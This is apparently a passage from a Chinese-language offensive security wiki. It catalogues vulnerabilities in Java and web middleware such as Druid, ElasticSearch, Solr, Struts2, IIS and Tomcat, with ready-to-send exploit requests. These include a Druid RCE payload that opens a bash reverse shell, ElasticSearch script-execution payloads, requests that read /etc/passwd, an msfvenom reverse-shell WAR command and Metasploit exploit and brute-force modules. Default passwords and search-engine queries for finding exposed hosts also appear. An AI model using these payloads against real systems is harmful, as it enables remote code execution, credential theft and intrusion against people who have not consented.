所以,ActiveMQ 在 5.12.x~5.13.x 版本中,已经默认关闭了 fileserver 这个应用 (你可以在 conf/jetty.xml 中开启之) ;在 5.14.0 版本以后,彻底删除了 fileserver 应用.
-
影响版本
- Apache ActiveMQ < 5.12.x
-
相关文章
CVE-2017-15709
-
描述
Apache ActiveMQ 默认消息队列 61616 端口对外,61616 端口使用了 OpenWire 协议,这个端口会暴露服务器相关信息,这些相关信息实际上是 debug 信息。会返回应用名称,JVM,操作系统以及内核版本等信息。
-
影响版本
- 5.14.0 < Apache ActiveMQ < 5.14.5
- 5.15.0 < Apache ActiveMQ < 5.15.2
-
POC | Payload | exp
telnet ip 61616
Axis
Axis 是一个开源的基于 XML 的 Web 服务架构。它包含了 Java 和 C++ 语言实现的 SOAP 服务器,以及各种公用服务及 API 以生成和部署 Web 服务应用。
相关文章
Axis-1.4-RCE
-
相关文章
-
POC | Payload | exp
Axis2默认弱口令
CAS
Apereo CAS 4.X 反序列化漏洞
-
相关文章
-
相关工具
- 21superman/Cas_Exploit - CAS反序列化漏洞利用工具
- cL0und/cas4.x-execution-rce - exp for 4.1.x-4.1.6, 4.1.7-4.2.x, padding oracle attack
- langligelang/CAS_EXP
- MrMeizhi/ysoserial-mangguogan - ApereoCas反序列化回显与检测
- nice0e3/Cas_Exploit
Cocoon
CVE-2020-11991 XML 注入
-
描述
程序使用了 StreamGenerator 这个方法时,解析从外部请求的 xml 数据包未做相关的限制,恶意用户就可以构造任意的 xml 表达式,使服务器解析达到 XML 注入的安全问题。
-
POC | Payload | exp
POST /v2/api/product/manger/getInfo <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo>
ColdFusion
CVE-2017-3066 反序列化漏洞
- POC | Payload | exp
Druid
Alibaba_Druid
未授权访问
Apache_Druid
Fofa : title="Apache"&&title="Druid"
Apache Druid 是用 Java 编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。
CVE-2021-25646
-
描述
Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
-
影响版本
- Apache Druid < 0.20.1
-
相关文章
-
POC | Payload | exp
POST /druid/indexer/v1/sampler HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 1044 Connection: close {"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
CVE-2021-26919
CVE-2021-36749
- POC | Payload | exp
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
Dubbo
fofa: app="APACHE-dubbo"
Apache Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
相关工具
- threedr3am/dubbo-exp - Dubbo 反序列化一键快速攻击测试工具,支持 dubbo 协议和 http 协议,支持 hessian 反序列化和 java 原生反序列化。
CVE-2019-17564 pache Dubbo 反序列化漏洞
- 相关文章
CVE-2021-30179 Apache Dubbo RCE
CVE-2021-43297
ElasticSearch
shodan : port:9200 json
ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布式多用户能力的全文搜索引擎,基于 RESTful web 接口.Elasticsearch 是用 Java 开发的,并作为 Apache 许可条款下的开放源码发布,是当前流行的企业级搜索引擎.
未授权访问漏洞
http://[ip]:9200
http://[ip]:9200/_plugin/head/
web 管理界面http://[ip]:9200/hello/_search?pretty&size=50&from=50
http://[ip]:9200/_cat/indices
http://[ip]:9200/_river/_search
查看数据库敏感信息http://[ip]:9200/_nodes
查看节点数据http://[ip]:9200/_cat/indices?v
查看当前节点的所有 Indexhttp://[ip]:9200/_search?pretty=true
查询所有的 index, type- Elasticvue - 进行未授权访问漏洞利用的插件
CVE-2014-3120 ElasticSearch 命令执行漏洞
-
描述
老版本 ElasticSearch 支持传入动态脚本 (MVEL) 来执行一些复杂的操作,而 MVEL 可执行 Java 代码,而且没有沙盒,所以我们可以直接执行任意代码.
-
影响版本
- ElasticSearch 1.1.1
-
POC | Payload | exp
来源: ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境
首先,该漏洞需要 es 中至少存在一条数据,所以我们需要先创建一条数据:
POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 25 { "name": "test" }
然后,执行任意代码:
POST /_search?pretty HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 343 { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } }
CVE-2015-1427 Groovy 沙盒绕过 && 代码执行漏洞
-
描述
CVE-2014-3120 后,ElasticSearch 默认的动态脚本语言换成了 Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。
-
影响版本
- ElasticSearch < 1 .3.7
- ElasticSearch 1.4.0 ~ 1.4.2
-
相关文章
-
POC | Payload | exp
来源: ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境
由于查询时至少要求 es 中有一条数据,所以发送如下数据包,增加一个数据:
POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 25 { "name": "test" }
然后发送包含 payload 的数据包,执行任意命令:
POST /_search?pretty HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/text Content-Length: 156 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
CVE-2015-3337 目录穿越漏洞
-
描述
在安装了具有"site"功能的插件以后,插件目录使用 ../ 即可向上跳转,导致目录穿越漏洞,可读取任意文件.没有安装任意插件的 elasticsearch 不受影响.
-
影响版本
- ElasticSearch < 1.4.4
- ElasticSearch 1.5.0 ~ 1.5.1
-
POC | Payload | exp
来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
-
http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
(不要在浏览器访问) -
http://your-ip:9200/_plugin/head/
-
CVE-2015-5531
-
描述
elasticsearch 1.5.1 及以前,无需任何配置即可触发该漏洞.之后的新版,配置文件 elasticsearch.yml 中必须存在 path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置.不配置该值,默认不启动这个功能.
-
影响版本
- ElasticSearch < 1.6.0
-
相关文章
-
POC | Payload | exp
来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/
新建一个仓库
PUT /_snapshot/test HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 108 { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" } }
创建一个快照
PUT /_snapshot/test2 HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 108 { "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } }
目录穿越读取任意文件
http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
在错误信息中包含文件内容 (编码后) ,对其进行解码即可获得文件
log4j 影响
Flink
Fofa: app="APACHE-Flink"
CVE-2020-17518 文件写入
-
相关文章
-
POC | Payload | exp
CVE-2020-17519 文件读取
-
相关文章
-
POC | Payload | exp
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
httpd
CVE-2007-6750 Apache ddos
-
描述
Apache HTTP Server 1.x版本和2.x版本中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。
-
MSF Module
use auxiliary/dos/http/slowloris set RHOST <rhost> run
CVE-2017-15715 Apache 解析漏洞
-
影响版本
- 2.4.0 < HTTPD <2.4.29
-
相关文章
SSI 远程命令执行漏洞
- 相关文章
CVE-2019-0211 Apache HTTP 服务组件提权漏洞
-
相关文章
-
POC | Payload | exp
CVE-2021-40438
-
相关文章
-
POC | Payload | exp
CVE-2021-41773 Apache HTTP Server 路径穿越漏洞
CVE-2021-42013 Apache任意文件读取补丁绕过
IIS
相关文章
IIS shortname
-
描述
windows 在创建一个新文件时,操作系统还会生成 8.3 格式的兼容 MS-DOS 的(短)文件名,以允许基于 MS-DOS 或16位 windows 的程序访问这些文件.
-
修复方案
- 升级 .net framework 至 4.0 版本或以上
- 修改 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem 值 NtfsDisable8dot3NameCreation 为 1
-
相关文章
-
POC | Payload | exp
1. http://www.xxx.com/*~1*/.aspx 2. http://www.xxx.com/l1j1e*~1*/.aspx # 若1返回404而2返回400,则可以判断目标站点存在漏洞. http://www.xxx.com/a*~1*/.aspx # 若存在将返回404,不存在则返回400.以此类推,不断向下猜解所有的6个字符.
Windows Server 2008 R2 查询是否开启短文件名功能:fsutil 8dot3name query 关闭该功能:fsutil 8dot3name set 1 Windows Server 2003 关闭该功能:fsutil behavior set disable8dot3 1
.Net Framework 拒绝服务攻击
-
描述
当请求文件夹名称包含
~1
的请求,会导致不存在该文件的 .Net Framework 去递归查询所有根目录.如果只有一个"1"是无效的,当"1"大于一个,比如像这样:/wwwtest/fuck~1/~1/~1/~1.aspx
此时文件系统会这样调用:
\wwwtest SUCCESS \wwwtest\fuck~1\~1\~1\~1 PATH NOT FOUND \wwwtest\fuck~1 NAME NOT FOUND \wwwtest\fuck~1\~1\ PATH NOT FOUND \wwwtest\fuck~1\~1\~1\ PATH NOT FOUND \wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND \wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND \wwwtest\fuck~1\~1\~1 PATH NOT FOUND \wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND \wwwtest\fuck~1\~1\~1 PATH NOT FOUND \wwwtest\fuck~1\~1 PATH NOT FOUND \wwwtest\fuck~1 NAME NOT FOUND \wwwtest SUCCESS \wwwtest SUCCESS
如果我们请求的文件/文件夹名同时存在大小写时,这个请求会被请求两次,一次是原封不动的请求,一次是全部使用小写的请求.
下表显示了每个请求的 FS 调用的数量(Windows 2008 R2, IIS 7.5(latest patch - June 2012), and .Net framework 4.0.30319 (在别的系统下可能会不同))
CVE-2017-7269 IIS6.0 RCE
-
描述
CVE-2017-7269 是 IIS 6.0 中存在的一个栈溢出漏洞,在 IIS6.0 处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行 memcpy 对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。
-
影响版本
- IIS 6.0
- win 2003-r2
-
相关文章
-
POC | Payload | exp
-
MSF Module
use exploit/windows/iis/cve-2017-7269
JBOSS
相关文章
相关工具
- joaomatosf/jexboss - JBoss(和其他Java反序列化漏洞)验证和利用工具
目录结构
home 文件夹
- bin:该目录包含所有入口点 Java 包 (Java Archives, JAR) 和脚本, 包括启动和关闭。
- client:该目录存储可能由外部 Java 客户端应用使用的配置文件。
- commion:该目录包含所有服务端的通用 JAR 包及配置文件。
- docs:该目录包含 JBoss 文档及模式 (schema), 它们在开发过程中非常有用。
- lib:该目录包含 JBoss 启动所需的所有 JAR 包。
- server:该目录包含与不同服务器配置相关的文件, 包括正式环境和测试环境。
/server/default 文件夹
- conf:该目录包含配置文件, 包括 1ogin-config 及 bootstrap config。
- data:该目录可用于在文件系统中存储内容的服务。
- deploy:该目录包含部署在服务器上的 WAR 文件。
- lib:该目录是启动时把静态 Java 类库加载到共享类路径的默认位置。
- Log:该目录是所有日志写入的目录。
- tmp:JBoss 使用该目录存储临时文件。
- work:该目录包含编译后的 JSP 和类文件。
/server/default/deploy 文件夹
- admin-console.war:是 JBoss AS 的管理控制台
- ROOT. war:根 (/root) Web 应用程序。
- jbossweb.sar:服务器上部署的 Tomcat Servlet 引擎。
- jbossws.sar:支持 Web 服务的 JBoss 服务。
未授权访问漏洞
-
描述
部分版本 JBoss 默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。
http://[ip]:8080/jmx-console
CVE-2016-7065 Red Hat JBoss EAP - Deserialization of Untrusted Data
-
描述
JBoss 企业应用程序平台(EAP)4和5中的 JMX servlet 允许远程 DOS,并可能通过精心设计的序列化 Java 对象执行任意代码。
-
影响版本
- JBOSS 4.0.0
- JBOSS 5.0.0
-
POC | Payload | exp
CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞
-
描述
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
-
POC | Payload | exp
CVE-2017-12149 JBoss 5.x/6.x 反序列化漏洞
-
描述
该漏洞为 Java 反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
-
影响版本
- JBOSS 5.0.0 ~ 5.2.2
-
POC | Payload | exp
JMXInvokerServlet 反序列化漏洞
- POC | Payload | exp
Jetty
CVE-2021-28164 && CVE-2021-28169
- 相关文章
Nacos
FOFA: title="Nacos"
CVE-2021-29441 && CVE-2021-29442 nacos v1.x authentication bypass
- 相关文章
- POC | Payload | exp
- tips
- 大部分企业的 nacos 的 url 为 /v1/auth/users ,而不是 /nacos/v1/auth/users 可以按目标情况自行修改(from: PeiQi_WiKi)
Nacos Client Yaml反序列化
-
影响版本
- Nacos < 1.4.2
-
相关文章
Resin
官网 : https://caucho.com/
相关文章
Resin 任意文件读取漏洞
- 相关文章
Resin 文件解析漏洞
- 相关文章
Nginx
CVE-2021-23017
RabbitMQ
Fofa: app="RabbitMQ"
默认口令
guest
guest
RocketMQ
Tips
- 4.0.x ~ 4.3.x 存在 fastjson 1.2.29
Shiro
Solr
Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理.
Solr 的漏洞情报参考 https://issues.apache.org/jira/projects/SOLR/issues
资源
- Imanfeng/Apache-Solr-RCE - Solr RCE 整理
- veracode-research/solr-injection - Apache Solr 注入研究
CVE-2017-12629 Apache solr XML 实体注入漏洞
-
描述
原理大致是文档通过 Http 利用 XML 加到一个搜索集合中.查询该集合也是通过 http 收到一个 XML/JSON 响应来实现.此次 7.1.0 之前版本总共爆出两个漏洞:XML 实体扩展漏洞 (XXE) 和远程命令执行漏洞 (RCE) ,二者可以连接成利用链,编号均为 CVE-2017-12629.
-
影响版本
- Apache solr 5.5.0 ~ 5.5.4
- Apache solr 6.0.0 ~ 6.6.1
- Apache solr 7.0.0 ~ 7.0.1
-
相关文章
CVE-2019-0192 Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5
-
描述
ConfigAPI 允许通过 HTTP POST 请求配置 Solr 的 JMX 服务器。通过将其指向恶意的 RMI 服务器,攻击者可以利用 Solr 的不安全反序列化功能在 Solr 端触发远程代码执行。
-
影响版本
- Apache solr 5.0.0 ~ 5.5.5
- Apache solr 6.0.0 ~ 6.6.5
-
POC | Payload | exp
CVE-2019-0193 Apache Solr 远程命令执行漏洞
-
描述
此次漏洞出现在 Apache Solr 的 DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据.它具有一个功能,其中所有的 DIH 配置都可以通过外部请求的 dataConfig 参数来设置.由于 DIH 配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行.
-
影响版本
- Apache solr < 8.2.0
-
相关文章
-
POC | Payload | exp
CVE-2019-12409
-
相关文章
-
POC | Payload | exp
CVE-2019-17558 Apache Solr Velocity 模版注入远程命令执行漏洞
-
描述
2019年10月,安全研究人员放出了一个关于 solr 模板注入的 exp,攻击者通过未授权访问 solr 服务器,发送特定的数据包开启 params.resource.loader.enabled,然后 get 访问接口导致服务器命令执行,命令回显结果在 response。
-
影响版本
- Apache Solr < 8.2.0
-
相关文章
-
POC | Payload | exp
CVE-2020-13957 Apche Solr 未授权上传
-
描述
在特定的 Solr 版本中 ConfigSet API 存在未授权上传漏洞,攻击者利用漏洞可实现远程代码执行。
-
影响版本
- Apache Solr 6.6.0 -6.6.5
- Apache Solr 7.0.0 -7.7.3
- Apache Solr 8.0.0 -8.6.2
-
相关文章
Apache Solr =< 8.8.1 任意文件读取漏洞
-
相关文章
-
POC | Payload | exp
GET /solr/admin/cores?wt=json GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream
Apache Solr<= 8.8.2 任意文件删除
CVE-2021-27905 ssrf
- POC | Payload | exp
Spring
Struts2
fofa: app="Struts2"
Struts2 的漏洞情报参考 https://cwiki.apache.org/confluence/display/WW/Security+Bulletins
指纹
Struts
.action
.do
.action!xxxx
.c
相关工具
- Lucifer1993/struts-scan - Python2 编写的 struts2 漏洞全版本检测和利用工具
- HatBoy/Struts2-Scan - Python3 Struts2 全漏洞扫描利用工具
- shack2/Struts2VulsTools - Struts2 系列漏洞检查工具
- x51/STS2G - Golang 版 Struts2 漏洞扫描利用工具
环境搭建
- wh1t3p1g/Struts2Environment - Struts2 历史版本的漏洞环境
- sie504/Struts-S2-xxx - 整理收集Struts2漏洞环境
- shengqi158/S2-055-PoC - S2-055的环境,基于rest-show-case改造
相关文章
S2-016 & CVE-2013-2251
-
描述
DefaultActionMapper 类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟 OGNL 表达式,由于 struts2 没有对这些前缀做过滤,导致利用 OGNL 表达式调用 java 静态方法执行任意系统命令
-
影响版本
- Struts 2.0.0 ~ 2.3.15
-
POC | Payload | exp
S2-020 & CVE-2014-0094 & CNNVD-201403-191
-
描述
Apache Struts 2.0.0-2.3.16 版本的默认上传机制是基于 Commons FileUpload 1.3 版本,其附加的 ParametersInterceptor 允许访问'class' 参数(该参数直接映射到
getClass()
方法),并允许控制 ClassLoader。在具体的 Web 容器部署环境下(如:Tomcat),攻击者利用 Web 容器下的 Java Class 对象及其属性参数(如:日志存储参数),可向服务器发起远程代码执行攻击,进而植入网站后门控制网站服务器主机。 -
影响版本
- Struts 2.0.0 ~ 2.3.16.1
-
相关文章
-
POC | Payload | exp
S2-045 & CVE-2017-5638
-
描述
恶意用户可在上传文件时通过修改 HTTP 请求头中的 Content-Type 值来触发该漏洞进而执行系统命令.
-
影响版本
- Struts 2.3.5 ~ 2.3.31
- Struts 2.5 ~ 2.5.10
-
POC | Payload | exp
S2-046 & CVE-2017-5638
-
描述
该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改 HTTP 请求头中的 Content-Type 值,构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令.
-
影响版本
- Struts 2.3.5 ~ 2.3.31
- Struts 2.5 ~ 2.5.10
-
修复方案
- 官方已经发布版本更新,尽快升级到不受影响的版本(Struts 2.3.32 或 Struts 2.5.10.1),建议在升级前做好数据备份.
- 临时修复方案
在用户不便进行升级的情况下,作为临时的解决方案,用户可以进行以下操作来规避风险:在 WEB-INF/classes 目录下的 struts.xml 中的 struts 标签下添加
<constant name="struts.custom.i18n.resources" value="global" />
在 WEB-INF/classes/ 目录下添加 global.properties,文件内容如下:
struts.messages.upload.error.InvalidContentTypeException=1
-
POC | Payload | exp
S2-048 & CVE-2017-9791
-
描述
攻击者可以构造恶意的字段值通过 Struts2 的 struts2-struts1-plugin 插件,远程执行代码。
-
影响版本
- Struts 2.1.x ~ 2.3.x
-
POC | Payload | exp
S2-052 & CVE-2017-9805
-
描述
启用 Struts REST 插件并使用 XStream 组件对 XML 进行反序列操作时,未对数据内容进行有效验证,可被攻击者进行远程代码执行攻击(RCE)。
-
影响版本
- Struts 2.1.6 ~ 2.3.33
- Struts 2.5 ~ 2.5.12
-
POC | Payload | exp
S2-053 & CVE-2017-12611
-
描述
当开发者在 Freemarker 标签中使用如下代码时
<@s.hidden name=”redirectUri” value=redirectUri /><@s.hidden name=”redirectUri” value=”${redirectUri}” />
Freemarker 会将值当做表达式进行执行,最后导致代码执行。 -
影响版本
- Struts 2.0.0 ~ 2.3.33
- Struts 2.5 ~ 2.5.10.1
-
POC | Payload | exp
S2-055 & CVE-2017-7525
-
描述
2017年12月1日,Apache Struts 发布最新的安全公告,Apache Struts 2.5.x REST 插件存在远程代码执行的中危漏洞,漏洞编号与 CVE-2017-7525 相关。漏洞的成因是由于使用的 Jackson 版本过低在进行 JSON 反序列化的时候没有任何类型过滤导致远程代码执行。。
-
影响版本
- Struts 2.5 ~ 2.5.14
-
POC | Payload | exp
S2-056 & CVE-2018-1327
-
描述
S2-056 漏洞发生于 Apache Struts 2的 REST 插件,当使用 XStream 组件对 XML 格式的数据包进行反序列化操作,且未对数据内容进行有效验证时,攻击者可通过提交恶意 XML 数据对应用进行远程 DoS 攻击。
-
影响版本
- Struts 2.1.1 ~ 2.5.14.1
-
POC | Payload | exp
S2-057 & CVE-2018-11776
-
描述
该漏洞由 Semmle Security Research team 的安全研究员 Man YueMo 发现.该漏洞是由于在 Struts2 开发框架中使用 namespace 功能定义 XML 配置时,namespace 值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符 namespace,可能导致远程代码执行.
-
影响版本
- Struts 2.0.4 ~ 2.3.34
- Struts 2.5.0 ~ 2.5.16
-
POC | Payload | exp
S2-059 & CVE-2019-0230
-
描述
Apache Struts 框架, 会对某些特定的标签的属性值,比如 id 属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的 OGNL 表达式,造成 OGNL 表达式注入。从而可能造成远程执行代码。
-
影响版本
- Struts 2.0.0 ~ 2.5.20
-
相关文章
-
POC | Payload | exp
S2-061 & CVE-2020-17530
-
描述
S2-061 是对 S2-059 的绕过,Struts2 官方对 S2-059 的修复方式是加强 OGNL 表达式沙盒,而 S2-061 绕过了该沙盒。该漏洞影响版本范围是 Struts 2.0.0 到 Struts 2.5.25。
-
相关文章
-
POC | Payload | exp
Tapestry
CVE-2021-27850
-
相关文章
-
POC | Payload | exp
Tomcat
Tomcat 默认端口为 8080,也可能被改为其他端口,后台管理路径为 /manager/html
,后台默认弱口令 admin/admin、tomcat/tomcat 等,若果配置不当,可通过"Tomcat Manager"连接部署 war 包的方式获取 webshell.
搭建教程
相关文章
Tips
- tomcat5 默认有两个角色:tomcat 和 role1。其中账号 both、tomcat、role1 的默认密码都是 tomcat。不过不具备部署应用的权限,默认需要 manager 权限才能够直接部署 war 包.
- tomcat6 默认没有配置任何用户以及角色,没办法用默认账号登录.
- tomcat7 与6类似
- tomcat8 其实从6开始,tomcat 就将默认的用户去掉了
- 控制台路径
/manager/status
/manager/html
/host-manager/
jar -cf job.war ./job.jsp
生成 war 包- 如果应用存在 lfi,可以配合以下几点进一步挖掘信息:
- web应用的配置文件可能在
/webapps/[web应用名]/WEB-INF/classes/
目录下, xxx.properties 后缀的文件。 - tomcat 配置 /Conf/tomcat-users.xml
- web应用的配置文件可能在
爆破 Manager APP
Manager 管理平台我们都很熟悉,也是最常见的,包含多个管理模块,开启后方便开发及运维人员对 tomcat 项目发布进行管理。Manager 管理平台默认安装后是没有设置登录口令的,需要在 tomcat-user.xml 文件中进行配置,与上文的 admin 管理平台相同。
在登录 manager 后台时,tomcat 使用的是 Basic 认证方式,在请求的数据包中包含一个 Authorization 字段,该字段的值为账号密码的 base64 编码,口令形式为 username:password
- http://user:password@xxx.xxx.xxx.xxx:xxx/manager/html
- MSF Module
use auxiliary/scanner/http/tomcat_mgr_login
Tomcat manager 包含 4 个不同的角色:
- manager-gui:允许访问 html 页面接口 (即 URL 路径为 / manager/html/*)
- manager-script:允许访问纯文本接口 (即 URL 路径为 / manager/text/*)
- manager-jmx:允许访问 JMX 代理接口 (即 URL 路径为 / manager/jmxproxy/*)
- manager-status:允许访问 Tomcat 只读状态页面 (即 URL 路径为 / manager/status/*)
其中 manager-gui、manager-script、manager-jmx 三个角色均具备 manager-status 角色的权限,即这三种角色权限无需再额外添加 manager-status 权限。实际使用中只需配置 manager-gui 角色通过 html 页面的形式访问管理平台。
manager-jmx
Tomcat 使用 JMX 管理方式,在 Tomcat 的自带应用 manager 就是使用了 JMX 方式来管理 Tomcat,以此完成 Web 应用的动态部署、启动、停止。在 tomcat 的帮助文档中,提供了下面几种方式发送请求获取相应的信息:
- query 命令:http://[ip]:[port]/manager/jmxproxy/?qry=
- get 命令:http:// [ip]:[port]/manager/jmxproxy/?get=
- set 命令:http:// [ip]:[port]/manager/jmxproxy/?set=
- invoke 命令:http:// [ip]:[port]/manager/jmxproxy/?invoke=
访问上面的地址,我们就可以看到不同的信息,通过向不同的参数传递特定的参数,也可以获取到一些敏感信息。不加参数时查询到的是所有的 MBeans 的内容,加参数之后就可以查看到具体的 MBeans 的内容。
例如: http://[ip]:[port]/manager/jmxproxy/?qry=*%3atype=User%2c*
该查询可以看到设置的 tomcat-user.xml 中配置的账号密码,甚至还可以通过 set 命令修改账号密码,来设置一个后门账号。
War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
样例目录 session 操纵漏洞
Tomcat 在安装部署后,在 webapps 默认存在一个 examples 目录,该目录正如其文件名一样,提供一些示例应用让使用者来了解 Tomcat 的特性及功能。这些样例在业务上线后并没有什么用处,建议部署 tomcat 后,删除其中的样例文件(ROOT, balancer,jsp-examples, servlet-examples, tomcat-docs, webdav),避免信息泄露和其他潜在的安全风险。
这些样例中的 session 样例(/examples/servlets/servlet/SessionExample)允许用户对 session 进行操纵,因为 session 是全局通用的,所以用户可以通过操纵 session 获取管理员权限,存在一定的安全风险,不过这种基本上只有在一些比较老的不安全系统中才有可能出现,利用条件比较苛刻。
CVE-2016-1240
-
描述
10月1日,Tomcat 爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的 Tomcat 用户获得系统的 root 权限。
-
影响版本
- tomcat:6.0:*
- tomcat:7.0:*
- tomcat:8.0:*
-
POC | Payload | exp
CVE-2016-8735
-
描述
Oracle 修复了 JmxRemoteLifecycleListener 反序列化漏洞(CVE-2016-3427)。 Tomcat 也使用了 JmxRemoteLifecycleListener 这个监听器,但是 Tomcat 并没有及时升级,存在这个远程代码执行漏洞。
-
漏洞利用条件
外部需要开启 JmxRemoteLifecycleListener 监听的 10001 和 10002 端口来实现远程代码执行。
-
影响版本
- Tomcat 9.0.0.M1 ~ 9.0.0.M11
- Tomcat 8.5.0 ~ 8.5.6
- Tomcat 8.0.0.RC1 ~ 8.0.38
